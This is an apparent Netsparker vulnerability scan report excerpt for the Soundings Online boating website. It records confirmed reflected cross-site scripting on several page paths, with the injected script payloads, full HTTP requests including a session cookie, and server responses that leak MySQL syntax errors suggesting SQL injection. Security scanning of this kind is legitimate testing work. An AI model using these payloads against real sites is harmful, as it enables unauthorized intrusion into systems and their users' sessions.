Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:36:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:36:58 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002499)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x002499)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/on-powerboats/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Take a Closer Look into Powerboating at Soundings Online</title> <link href="/boat-shop/on-powerboats?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/on-powerboats?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_on_powerboats m_on_powerboats"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 49, c_on_powerboats<br />Menu: 81, m_on_powerboats-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&a..
- /boat-shop/new-boats/

/boat-shop/new-boats/ CONFIRMED

http://www.soundingsonline.com/boat-shop/new-boats/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0024CA)</script>

Request

GET /boat-shop/new-boats/?'"--></style></script><script>netsparker(0x0024CA)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/boat-shop/new-boats/272122-cabo-44-htx-comfort-meets-hardcore-fishing
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:37:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:37:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0024CA)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0024CA)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/new-boats/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Read about the Newest Boats and Specifications on Soundings Online</title> <link href="/boat-shop/new-boats?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link href="/boat-shop/new-boats?format=feed&amp;type=atom" rel="alternate" type="application/atom+xml" title="Atom 1.0" /> <link href="/templates/soundings1/favicon.ico" rel="shortcut icon" type="image/x-icon" /> <link rel="stylesheet" href="http://www.soundingsonline.com/components/com_yvcomment/assets/style001.css" type="text/css" /> <script type="text/javascript" src="/media/system/js/mootools.js"></script> <script type="text/javascript" src="/media/system/js/caption.js"></script>

<meta name="verify-v1" content="l1mWAXJWn7Xr+Frn4D39PflSoePEdoO72UMDIxIVjvk=" />

<link rel="stylesheet" href="/templates/system/css/system.css" type="text/css" />
<link rel="stylesheet" href="/templates/system/css/general.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/allstyles.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/navbar.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/editor.css" type="text/css" />
<link rel="stylesheet" href="/templates/soundings1/css/print.css" type="text/css" media="print" />
<link rel="stylesheet" type="text/css" href="/shadowbox/shadowbox.css" />
<link rel="stylesheet" href="/templates/soundings1/css/fadw.css" type="text/css" media="screen,projection" />
<!--[if lte IE 6]>
<link href="/templates/soundings1/css/ieonly.css" rel="stylesheet" type="text/css" />
<![endif]-->
<!--[if IE 7]>
<link href="/templates/soundings1/css/ie7only.css" rel="stylesheet" type="text/css" />
<![endif]-->

<script type="text/javascript" src="/shadowbox/shadowbox.js"></script>
<script type="text/javascript">
Shadowbox.init({
players: ["img","flv","iframe"]
});
</script>

<script src="/templates/soundings1/javascript/allscripts.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/fadw.js" type="text/javascript"></script>
<script src="/templates/soundings1/javascript/suckerfish_menu.js" type="text/javascript"></script>
<script language="JavaScript" type="text/javascript" src="//www.soundingsonline.com/s_code.js"></script>

<!------ OAS SETUP begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
//configuration
OAS_url = 'http://oasc05139.247realmedia.com/RealMedia/ads/';
OAS_sitepage = 'www.soundingsonline.com/index.php';
OAS_listpos = 'Top,Middle,Right,Right1,x01,x02,x03,x04';
OAS_query = '';
OAS_target = '_top';
//end of configuration
OAS_version = 10;
OAS_rn = '001234567890'; OAS_rns = '1234567890';
OAS_rn = new String (Math.random()); OAS_rns = OAS_rn.substring (2, 11);
function OAS_NORMAL(pos) {
document.write('<A HREF="' + OAS_url + 'click_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" TARGET=' + OAS_target + '>');
document.write('<IMG SRC="' + OAS_url + 'adstream_nx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '!' + pos + '?' + OAS_query + '" BORDER=0></A>');
}
//-->
</SCRIPT>
<SCRIPT LANGUAGE=JavaScript1.1>
<!--
OAS_version = 11;
if ((navigator.userAgent.indexOf('Mozilla/3') != -1) || (navigator.userAgent.indexOf('Mozilla/4.0 WebTV') != -1))
OAS_version = 10;
if (OAS_version >= 11)
document.write('<SCR' + 'IPT LANGUAGE=JavaScript1.1 SRC="' + OAS_url + 'adstream_mjx.ads/' + OAS_sitepage + '/1' + OAS_rns + '@' + OAS_listpos + '?' + OAS_query + '"><\/SCRIPT>');//-->
</SCRIPT><SCRIPT LANGUAGE=JavaScript>
<!--
document.write('');
function OAS_AD(pos) {
if (OAS_version >= 11)
OAS_RICH(pos);
else
OAS_NORMAL(pos);
} //-->
</SCRIPT>
<!------ OAS SETUP end ------>

</head>


<body class="s_boat_shop c_new_boats m_new_boats"><!--
Type of page: category<br />Section: 6, s_boat_shop<br />Category: 47, c_new_boats<br />Menu: 62, m_new_boats-->
<!--
The name of this site is Soundings Online<br />
The administrator email is e.cirillo@soundingspub.com<br />
This template is in the soundings1 directory<br />
The URL is http://www.soundingsonline.com/-->

<div id="all">
<div id="header">
<div id="leaderboard">
<!------ OAS AD 'Top' begin ------>
<SCRIPT LANGUAGE=JavaScript>
<!--
OAS_AD('Top');
//-->
</SCRIPT>
<!------ OAS AD 'Top' end ------>
</div>

<div id="search_bar">
<ul class="menu"><li class="item60"><a href="/archives"><span>Archives</span></a></li><li class="item105"><a href="http://www.barkerstores.com/soundings" target="_blank"><span>Buy Soundings Gear</span></a></li><li class="item106"><a href="/advertise"><span>Advertise</span></a></li></ul><!-- Extra Menu -->
<form action="index.php" method="post"> <div class="search"> <input name="searchword" id="mod_search_searchword" maxlength="30" alt="Search" class="inputbox" type="text" size="30" value="Search..." onblur="if(this.value=='') this.value='Search...';" onfocus="if(this.value=='Search...') this.value='';" /><input type="submit" value="Search" class="button" onclick="this.form.searchword.focus();"/> </div> <input type="hidden" name="task" value="search" /> <input type="hidden" name="option" value="com_search" /></form><!-- Search -->
</div> <!-- end search_bar -->

<h1 id="logo"><a href="/index.php"><img src="/templates/soundings1/images/snd_logo.jpg" alt="Soundings" /></a></h1>
<!--<div id="sub_cover"><a href="/"><img src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" /></a></div>-->

<div id="sub_cover">
<map name="subCoverMap" id="subCovers">
<area shape="rect" coords="2,130,83,152" href="http://www.soundingsonline.com/subscription-services" alt="Subscribe" />
<area shape="rect" coords="84,122,164,152" href="http://www.soundingsonline.com/subscription-services/preview-current-issue" alt="Preview Current Issue" />
<img name="subCover" src="/templates/soundings1/images/subcovers.jpg" alt="Subscribe or Preview the Current Issue" usemap="#subCoverMap" border="0" />
</map>
</div>

<div id="tabs">
<map name="tabsMap" id="tabsMap">
<area shape="rect" coords="0,0,130,40" href="http://www.soundingsonline.com/index.php?option=com_content&view=category&layout=blog&id=98&Itemid=111" alt="Buy a Boat" onmouseover="rollOn('nav1'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="131,0,241,40" href="http://www.soundingssellmyboat.com/" target="_blank" alt="Sell a Boat" onmouseover="rollOn('nav2'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="242,0,357,40" href="http://www.soundingsonline.com/component/content/article/237622" alt="Service Directory" onmouseover="rollOn('nav3'); return true;" onmouseout="rollOff(); return true;" />
<area shape="rect" coords="358,0,471,40" href="http://www.soundingsonline.com/Waterfront/default.html" target="_blank" alt="Waterfront Property" onmouseover="rollOn('nav4'); return true;" onmouseout="rollOff(); return true;" />
</map>

<img name="navs" src="//www.soundingsonline.com/templates/soundings1/images/header_tabs.jpg" width="471" height="41" usemap="#tabsMap" border="0" alt="Buy a Boat Online Search, Sell a Boat Classifieds, Boat Locker Marketplace, Waterfront Property" />
</div>

<ul class="menu sf-menu" id="mainnav"><li id="current" class="active item1 active1"><a href="http://www.soundingsonline.com/"><span>Home</span></a></li><li class="parent item53"><a href="/news"><span>News</span></a><ul><li class="item115"><a href="/news/coastwise"><span>Coastwise</span></a></li><li class="item84"><a href="/news/todays-top-stories"><span>Today's Top Stories</span></a></li><li class="item86"><a href="/news/home-waters"><span>Home Waters</span></a></li><li class="item85"><a href="/news/mishaps-a-rescues"><span>Mishaps &amp; Rescues</span></a></li><li class="item88"><a href="/news/sailing"><span>Sailing</span></a></li><li class="item222"><a href="/news/dispatches"><span>Dispatches</span></a></li></ul></li><li class="parent item59"><a href="/boat-shop"><span>Boat Shop</span></a><ul><li class="item79"><a href="/boat-shop/sea-savvy"><span>Sea Savvy</span></a></li><li class="item93"><a href="/boat-shop/know-how"><span>Know-How</span></a></li><li class="item94"><a href="/boat-shop/q-a-a"><span>Q &amp; A</span></a></li><li class="item62"><a href="/boat-shop/new-boats"><span>New Boats</span></a></li><li class="item81"><a href="/boat-shop/on-powerboats"><span>On Powerboats</span></a></li><li class="item95"><a href="/boat-shop/on-sailboats"><span>On Sailboats</span></a></li><li class="item63"><a href="/boat-shop/used-boat-review"><span>Used Boat Review</span></a></li><li class="item64"><a href="/boat-shop/new-gear"><span>New Gear</span></a></li><li class="item152"><a href="/boat-shop/tech-talk"><span>Tech Talk</span></a></li></ul></li><li class="parent item65"><a href="/columns-blogs"><span>Columns/Blogs</span></a><ul><li class="item97"><a href="/columns-blogs/under-way"><span>Under Way</span></a></li><li class="item102"><a href="/columns-blogs/books"><span>Books</span></a></li><li class="item98"><a href="/columns-blogs/bay-tripper"><span>Bay Tripper</span></a></li><li class="item99"><a href="/columns-blogs/new-england-fishing"><span>New England Fishing</span></a></li></ul></li><li class="parent item67"><a href="/features"><span>Features</span></a><ul><li class="item89"><a href="/features/destinations"><span>Destinations</span></a></li><li class="item92"><a href="/features/in-depth"><span>In Depth</span></a></li><li class="item91"><a href="/features/type-of-boat"><span>Type of Boat</span></a></li><li class="item90"><a href="/features/profiles"><span>Profiles</span></a></li><li class="item112"><a href="/features/lifestyle"><span>Lifestyle</span></a></li><li class="item162"><a href="/features/technical"><span>Technical</span></a></li><li class="item103"><a href="/features/justyesterday"><span>Just Yesterday</span></a></li></ul></li><li class="item83"><a href="/calendar"><span>Calendar</span></a></li><li class="parent item68"><a href="/subscription-services"><span>Subscription Services</span></a><ul><li class="item113"><a href="http://www.soundingsonline.com/index.php?option=com_chronocontact&amp;chronoformname=CGPage"><span>C.G. Aux.</span></a></li><li class="item163"><a href="http://www.soundingsonline.com/component/chronocontact/?chronoformname=PSPage"><span>U.S. Power Squadron</span></a></li><li class="item69"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=XX&amp;PGTP=A"><span>Missing/Damaged Issue</span></a></li><li class="item73"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=AC&amp;PGTP=A"><span>Address/Email change</span></a></li><li class="item75"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=5U6&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QR&amp;PGTP=A"><span>Renew</span></a></li><li class="item76"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=SND&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"><span>Give a Gift</span></a></li><li class="item77"><a href="http://ezsub.net/isapi/foxisapi.dll/main.sv.run?jt=starr_wc&amp;PUBID=586&amp;SOURCE=INET&amp;RDRID=&amp;SBTYPE=QN&amp;PGTP=S"..
- /boat-shop/used-boat-review/

/boat-shop/used-boat-review/ CONFIRMED

http://www.soundingsonline.com/boat-shop/used-boat-review/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscri..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x0024C7)</script>

Request

GET /boat-shop/used-boat-review/?'"--></style></script><script>netsparker(0x0024C7)</script> HTTP/1.1
Referer: http://www.soundingsonline.com/boat-shop/used-boat-review/272562-irwin-43-mk-ii
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.soundingsonline.com
Cookie: d4dad6935f632ac35975e3001dc7bbe8=nrjskmc2lloa5mrm1f2a65vm63
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 25 Jan 2011 02:37:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET,PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Tue, 25 Jan 2011 02:37:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache


<blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0024C7)</script>' AND cookie_info=''' at line 1</font>]</font></blockquote><blockquote><font face=arial size=2 color=ff0000><b>SQL/DB Error --</b> [<font color=000077>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"--></style></script><script>netsparker(0x0024C7)</script>','','1')' at line 1</font>]</font></blockquote><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

<head>
<base href="http://www.soundingsonline.com/boat-shop/used-boat-review/" /> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Boating articles, boating, boats, marine industry, recreational boating, Boat shows, Yachts, used boats, new boats, used boat sales, new boat sales, boat classifieds, boats for sale, boat broker, boat reviews, boating magazine, boat features,nautical almanac, cruising, sailboat, powerboat,motor yacht, yacht, coast guard, coastguard, Northeast boating, Florida boating, gulf coast boating, Atlantic ocean boating, boating vacation, trawler, boat navigation, boat engines, boat motors, boat electronics, boat gear, boat accessories, boat safety,boating regulations, boating events" /> <meta name="description" content="SoundingsOnline features complete information and entertainment for recreational boaters, including breaking news, boating destinations, boats for sale, new boats and gear, and a complete calendar of boat shows and yachting events. News and feature articles about local people, boats and events are covered in our regional Home Waters section. Thousands of boats for sale; hundreds of waterfront homes." /> <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" /> <title>Used Boat Reviews from Readers, Stories and Boat Specifications</title> <link href="/boat-shop/used-boat-review?format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" /> <link 